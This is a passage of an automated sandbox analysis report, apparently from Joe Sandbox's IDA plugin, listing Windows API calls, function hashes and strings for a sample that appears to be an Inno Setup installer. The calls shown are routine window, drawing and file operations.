                                                                              • Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
                                                                              • Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                              • Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
                                                                              APIs
                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0047CC9E
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046BD7C), ref: 0047CCC4
                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0047CCD4
                                                                              • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047CCF5
                                                                              • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047CD09
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047CD25
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long$Show
                                                                              • String ID:
                                                                              • API String ID: 3609083571-0
                                                                              • Opcode ID: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
                                                                              • Instruction ID: b9d10cbe0955a365ec79174b91f205d0e2d6322d15c7b647bae3529478a090fa
                                                                              • Opcode Fuzzy Hash: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
                                                                              • Instruction Fuzzy Hash: 9A010CB5651210ABD710D7A8CD81F663798AB1D334F09067AB999DF2E2C629DC108B49
                                                                              APIs
                                                                                • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
                                                                              • UnrealizeObject.GDI32(00000000), ref: 0041B28C
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B29E
                                                                              • SetBkColor.GDI32(?,00000000), ref: 0041B2C1
                                                                              • SetBkMode.GDI32(?,00000002), ref: 0041B2CC
                                                                              • SetBkColor.GDI32(?,00000000), ref: 0041B2E7
                                                                              • SetBkMode.GDI32(?,00000001), ref: 0041B2F2
                                                                                • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                              • String ID:
                                                                              • API String ID: 3527656728-0
                                                                              • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                              • Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
                                                                              • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                              • Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
                                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateFileHandle
                                                                              • String ID: $pI$.tmp$}RI
                                                                              • API String ID: 3498533004-1860564545
                                                                              • Opcode ID: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
                                                                              • Instruction ID: 59b3140617fbadefd4c9ffb48c61b81df6a531bfad3e19e72d5fef91abd571f9
                                                                              • Opcode Fuzzy Hash: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
                                                                              • Instruction Fuzzy Hash: 0031A770A00219ABCB11EF95D942B9FBBB5AF45715F60412BF800B73C2D6785F0587AD
                                                                              APIs
                                                                                • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                              • ShowWindow.USER32(?,00000005,00000000,00496485,?,?,00000000), ref: 00496256
                                                                                • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB
                                                                                • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                              • String ID: .dat$.msg$IMsg$Uninstall
                                                                              • API String ID: 3312786188-1660910688
                                                                              • Opcode ID: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
                                                                              • Instruction ID: 58d6af22fd8ad1ff54f71e35ba593e4f31a3bf997598853b00730072561c9efa
                                                                              • Opcode Fuzzy Hash: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
                                                                              • Instruction Fuzzy Hash: C4319234A006149FCB00FFA5DD5295E7BB5FB48708F51847AF800A73A2CB78AD049B9C
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 00496744
                                                                              • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 0049676D
                                                                              • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00496786
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: File$Attributes$Move
                                                                              • String ID: $pI$isRS-%.3u.tmp
                                                                              • API String ID: 3839737484-4128586672
                                                                              • Opcode ID: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
                                                                              • Instruction ID: 5157d7ee42b340b6017ae31c030909d6195775d38fcd81d7ef1a959590527e8d
                                                                              • Opcode Fuzzy Hash: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
                                                                              • Instruction Fuzzy Hash: B7217371E00209AFCF00EFA9C8919AFBBB8EB44318F11457BB814B72D1D63C9E018A59
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042E94E
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E954
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042E97D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                              • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                              • API String ID: 828529508-2866557904
                                                                              • Opcode ID: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
                                                                              • Instruction ID: 1d35fa7d7a5cedd0232cd267efd28fbcee77054966ca8dd586963fa292d83f31
                                                                              • Opcode Fuzzy Hash: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
                                                                              • Instruction Fuzzy Hash: 58F0C2E134062136E660A67BACC2F6B15CC8F94729F54003BB108EA2C2E96C8945426F
                                                                              APIs
                                                                              • RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02161C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                              • RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02161C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                              • LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02161C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                              • RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02161C18,000023E4,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                              • String ID: t:r
                                                                              • API String ID: 730355536-924571639
                                                                              • Opcode ID: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
                                                                              • Instruction ID: b5067cfae5201e79e85213ffc863b03902d2ba9507e13bed97c350dada6f2a02
                                                                              • Opcode Fuzzy Hash: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
                                                                              • Instruction Fuzzy Hash: 9C01C0706442405EFB19AB69980A7263ED4D79574CF11803BF840A6AF1CAFC48A0CBAF
                                                                              APIs
                                                                              • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004534BF
                                                                                • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 004534E4
                                                                                • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesDeleteErrorLastMove
                                                                              • String ID: $pI$DeleteFile$MoveFile
                                                                              • API String ID: 3024442154-1403374609
                                                                              • Opcode ID: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
                                                                              • Instruction ID: 0b1c975e4cad0da58cdf6a339e0cc25f4cbee2301ce5bab719f8a23037a79807
                                                                              • Opcode Fuzzy Hash: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
                                                                              • Instruction Fuzzy Hash: D4F062742141456AEB11FFA6D95266E67ECEB4434BFA0443BF800B76C3DA3C9E094929
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
                                                                              • InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                              • String ID: ChangeWindowMessageFilter$user32.dll
                                                                              • API String ID: 3478007392-2498399450
                                                                              • Opcode ID: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
                                                                              • Instruction ID: 89e1f457e47db82f9faa956fb130fb356174019ed1a27fb48ec6c883adef8708
                                                                              • Opcode Fuzzy Hash: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
                                                                              • Instruction Fuzzy Hash: E4E08CA1340310EADA107BA26D8AF1A2654A320715F8C443BF080620E1C7BC0C60C95F
                                                                              APIs
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00476644
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                              • String ID: AllowSetForegroundWindow$user32.dll
                                                                              • API String ID: 1782028327-3855017861
                                                                              • Opcode ID: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
                                                                              • Instruction ID: 0cf89beef61ef8a76223fb5aa8394d6e95b25c45a6fd57a36df02fca6db0c00c
                                                                              • Opcode Fuzzy Hash: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
                                                                              • Instruction Fuzzy Hash: 79D0A9E0200F0169DD10B3F2AD47EAB329ECE84B10B92843B7408E3182CA3DE8404E3C
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: NotifyWinEvent$dD$user32.dll
                                                                              • API String ID: 1646373207-754903266
                                                                              • Opcode ID: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
                                                                              • Instruction ID: d2dc615c88fd328006faf79361cd74abdd3d8da8a377be2bcafca06377aa3dce
                                                                              • Opcode Fuzzy Hash: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
                                                                              • Instruction Fuzzy Hash: 37E012F0E41340AEFB00BFFB984271A3AA0B76431CB00007FB40066292CB7C48284A5F
                                                                              APIs
                                                                              • BeginPaint.USER32(00000000,?), ref: 00416C62
                                                                              • SaveDC.GDI32(?), ref: 00416C93
                                                                              • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
                                                                              • RestoreDC.GDI32(?,?), ref: 00416D1B
                                                                              • EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                              • String ID:
                                                                              • API String ID: 3808407030-0
                                                                              • Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                              • Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
                                                                              • Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                              • Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                              • Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
                                                                              • Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                              • Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
                                                                              • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
                                                                              • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
                                                                              • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
                                                                              • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
                                                                              • Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
                                                                              • Opcode Fuzzy Hash: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
                                                                              • Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                                              • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                                              • 73A1A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
                                                                              • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
                                                                              • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem$A26310A570DeleteObject
                                                                              • String ID:
                                                                              • API String ID: 4277397052-0
                                                                              • Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                              • Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
                                                                              • Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                              • Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98
                                                                              APIs
                                                                                • Part of subcall function 0045C76C: SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
